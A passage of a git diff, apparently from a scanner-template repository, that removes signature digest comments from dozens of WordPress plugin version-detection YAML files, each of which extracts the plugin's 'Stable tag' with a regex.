4a0a00473045022078c3914a743ac865a8c462b16de57e17c01e8061e06b4cae97e73e8598b2200d022100ee67e8cdad74d94ec1f9de938f5003d1d6f7e7180c7fa9d2b58d8be860c8fb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 1d0dc972bb..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220659854d9d453b597e99ec536856584a5e85fc39e1e889d50002e648db9668c0202200718206aec00f72faa78fd76491a2a2e36b85c1cdddbbf171296015d66c8c9ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 6566345e24..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f1075cc0ff6de006d85bcb22bc50986ec5cbf4a7830bf499e3ce841f4813d1202210090b7e06fac88e921102119b09e6b51c80ebda0e5c1eca3d3d83596ebcd236dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 03e78085f7..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220489942a3945e95f1cf17a5d65b3265298271036f676070d5b7e6c8f46e518b3c0221009490c2192ccf11447d3e390baeb83a06e6aa10cdf609074db2721be1f23e125b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 4f5b439488..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220076d9421b4dcb80b66d95bd767be3dbcebd10b483115ac4f7ed1f242f6b50194022100f5fadce73ebe166abbf6b34c2323369d2f3f0e5e6315aac5b51e419e5584ea57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 8f20bd8668..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb3cff15f2ad70357975c3e69ac11e909da71947e7f4dab930d0086fc2342134022100f1ad6363724a6b8751b59cb012b5ed516d71936bf89da9f6ca6aa0076d553548:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 2dbbedaf2d..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097972e736ed11b4f1d3900e3f75cb509cdfd08b5347ec9c4d40ecc369b20956b022071cb27db3fc347d4e524963675a81526958b3aa1db575b9cd6acaa9f113e7c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 3e6438faac..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3d5b40215f3ef92213f39022dbed512d7cccc2e43276bb09c1ff1e0f58b37f2022011692210364c52e3aa9eab1eaeae702a24b6141cdcd6e77578c95847ee7e5243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 5c77d6cdff..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d47ce1043936333554c3acdbeb9d1778cd652227b4af3a04c9348eb56b967a3002204237c82cf384e90ab6a10c094249b814d45ff894f120c01662d19ac2f2ea011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 41d35d2130..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060bb4d68e4124c13cf78c83ce2659074302baca648fac41dc64cb3aba884fc150221009d9461ffd175c8320f753a52d0b4f1d93cffd0112b97b63223a5676d4bf8f25c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ade751e8be..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e45d103e4fde972e1b81ee38482599e5eb76a819a1300a545852ee49870f52a02200cbc05cc0319c9ebad9a45aec4022fde268af05606dae3b9173dd54fcfe1292e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 19327f3ddc..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8261cb9c3743049d0da88307088d0969ce381d21a75e78172cff9226730ca99022100f8f4bd4f6ef1699cf1a3871b912d5955e6ad9e60573bce9abd6ce1f3ad3a5acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index c600b99f19..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036c55ea25525e822d87d3467d3bbe3b6244024608aba8fdabdfd929d88f29d8a0221008814eec272edcffa919ee3548436fdb0f7e3bb1359ee1afe2894300187b686b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 93f54ad182..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008fef2355754f039f5165cc9ae9f97e1784e37dce24d7564d03b48100a23eecc4022100a9223430dcf8bcfc173a7ab9fe0052d688ef22cdaffea597f64b85c374cd0e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index ddb7fafc07..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202447020bab4e2790bba359e76f33cc5b7fb71e66a1a1432f2b456739d1571e510221009a37b946dde63fe156c6cda837dfc973f5e4927d5984076af0565ebc4031a73f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index b961829045..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100965480ce85db1e228ed4b89079178211e0018ca1962e4b84abcf66fbd8444f77022100898127aaa95052de916a7ac2cc6b06667a3d0a886a79b69725a1c18b5187e8f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 913589dd20..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c42c60b14f158c4a0628b649184af2145a8a561ae19aa0a43ab92d2e88bc4ec02205afbd74e9291662f50483d5f33428a0c371f1a4c7e5c9cc20c6204c99ab5e680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index ab11a4ddad..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220482f9fe93de822ecbcd80dd11d6889f131e62c5dbe59fe80965edf710bf7ea57022024e56a288abaec85b5e78723389eab047c92d6a3e556fc8d9ad0058e4107c587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 9167acb6e0..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053f56c856672cd5437fe190f8ddf3ac6ca4ccdabf883b5c12550b373557ae61802205810fcf18dabc01c83d39c68b5c3ad7d0f26c33e6de5ada8b5b3a5ac0df28644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 9b6bb7b53f..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bcd575f4b04e2b4a7bcdc732fb3c108e53188b528e96588d1da6a76fc51307d8022100d5d0548d4ba35eb1ec6a8eed7cc7451e3704eb4e002ffe95a90fea0fed96c55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 22612c6cc3..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9d0e671b444e7fbcc505de73ce2467c0ab101ee6e7a24d5944532728762e9f2022100ced0aeb1462151d2f56729b99777fc98adba666736482172c5c73acc91de3899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index fb1903d50b..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042bcaf90a40ae83384580dba1f0df23ac02684b1f996ee31996cf9405443f4a1022100d1ae499f18da448848707a9421be1addfc2e60afe7e4a298817a9b8c915972bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 0e878ce214..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8387e2170e6eb8a34525c255614efbef585b01de52f74ab6866d0998397bf54022100d230c0bc05100968e58a019f7b62451294c56da10ec1da5e1fe05080dd8e03d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 2b6408c86c..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b080daf0928d86ebc3a68599e70daa8ef44fdba3a827f38779e7484eb4f8c61e0220033050eab5704bcd4ebd82d5506f09a92992b4ceb635ab23e3ca24a949856693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 2e23ab92a2..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a17d309fe65a146d87fec1fb3e8204dc9725fffca16e87be044e9fee763c9d80220760bf15bbe844609f78706b925981dc6e7a61c0fa98de6dbf507338e5aeed188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 0e87dec0bc..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014fca11dbecd3f7b100f0ee382f48a258e6620bf6d8e4aede2a9b6cb4b8741590220196017535cae218a4b9d08ddd3a4147dc9d702e6ccf7eec2f319ddd12dda46d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index e7362fe954..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d8ee19df4c8204503bc2a348842c19566f82db08da6034627d7140e0d6ed5cf022100f69e7fbb43b98b294090f93733755cf3a40c27a5c450373aaf6d8fc970a15995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 7009bdd5d5..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050a2336cde0de8b90755b475eec4a4e1ec5436094af3e10a485df154f597f8030221008bbde5a57055a6769224a450c5e4addb79e22a644f2522258461b34635ee684e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index dce76d8d05..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afaee136b00909658f93a9654e1b52dbe3f022ec3be3eda24d60b65b744bbc6902206b8aba2cd3403c74744f6343ec7c9cc97c80cc4be7da482f653ba877ecc96fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index c7c6d91cc5..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc5aed774d1b2128b49d0e0d36ea2a681d021d52bcabffe6f96557b6ff90be82022100a9ee86dbdfaa7ea4ee3704c13298b6598c778ee09eba80ca98afd6677b02df5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index eb0d512bb0..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e640093dfad085aba8706b2eaaf56d48e0fbb65b5a9216a72a6c0c00e32bb11e02207167fe0f44166fba090e20f3275616b869db062995e72492e74099c0da366973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 95e297b0f3..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf322e116c69e52eeddf83eef48535cecfd75743ee125fe55470d883198c6901022100de0dffd6fbcecd2012624b1e26f089fe5a0c62aa6a1dbe43da11e52cdbb42ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 2767a41fdd..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062ea563957d3ebdb3915c01b997421e0a7b56eb7aed0925d64baca5f72d28f81022100d5c9fec46f4742c882262a70a6075ab02e557224df2e84c28244d8980c57c4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b7d68ba8fc..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e527c54b09a9c85bcc1d9646ece627dc06e53e6025bf6deb43211e3489f6910b022069c28b97daf15a7cfd24a1cc397519f733b4adb887484f4cc01adc99db51392f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 92dc8a24ee..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cded7a6dd50ce10ff543b385429a3d010030e356d4c049a962f0a9fa91a0ed5402200904f1af7b3c0bf12619e408ee89def82d2bddcf378719a1296513274f5314bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index f182a9a5f5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa6eff4d1ddce1aa616ec1480df1e9cc35311f785d42d613105a3bacfa4579e0022100a6dc602e3cc81bd99ff3f5d6159ecfd5e61fff79bb820c2935e5dcb361675598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 8caa226535..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c16d40d27c810683d8328feae8ed100fb945ee9bf64c298df29699dea4f061730221009993b93fb31d3bb0cd730aa4efce52e14b8673f1aa2baccbbc327b1e716025c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index afe03072ec..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c3cd48a95ab83c80de60f8de08e2829b28f48f743fe1edd8c181122ba0a91ce022046f5e3d8dfef4eb8f13ba3959b2e1787bc50762b481eac39f244efe2ed8b2d76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index b3d6557e06..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d2fdb0b30cead328a1c292367cddb89ae90515493470a90473a83301e345a4e02200d941c45d0f369da569685371becf9a07abefc8f324cd4afdaed555a8b7625b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index ce072b1c26..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc8a75093f07bf6233fbe3ae49f4e214793dd38c56450e8ca6ca4acd2152011a022074a18d76919015f1b344cc020b8cff53515bf2035d33fb28eebe4091376bda05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 5d1eb7f17f..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de713f07660712ec249fe950c892c05c5edbb71f5b554ad3a89a46066efed221022100b25b325b99046fca924c77e3428da07f77ec423c455a0736cd6184fc21a74022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 4352910609..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae1c9cfc46fe67685209dd83e408c477bea61e8c228ad5df7044e2656414191d02210080440b044961b2460d8e1f16020a47bf208697282d9eee2e0f650da0e3634cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index b64caaf551..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099fb8af200be4f19b9efb355afd80862f49415b4f981e10e062690fc372ccf7d02210081705debfcbcfb27debdc689b9328a5245df12b0b45620691b78b97320149ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 7c589eb897..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a3fba997522b6375dc01ae816d5d7575740fb1c436db732e461e79851dff343022100aba982ab399e74e2f9ac443422662f5d27e1847ea4bc775101f8a3a33968e223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 4508433059..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026ce863e3324a4530f1379f3b2bbdb2c5201830d0d29307f796def7d9123bdae02204d3ae38938d8bc022057301b31709a51b4290178d0aae1d12fa90277ff9652c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 0d8a329ad3..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a49856814a72669370590435c3cce675878e49bb1fd477b7f2fd7bf6c4b9d77902205315b7cd369b634b3f67aab145b430a7f9c38604e8e8906a6b8336de106d01ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index b572df769b..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c53a143a27ee5f9bb174ecb258f3b1dfcb432090ffd01f68dd2c651a1059d2cd0221009b938b89e7a8e84f646900991872cd1c8bb4a851c6be995e817edf826be236c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 755cd94ccb..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 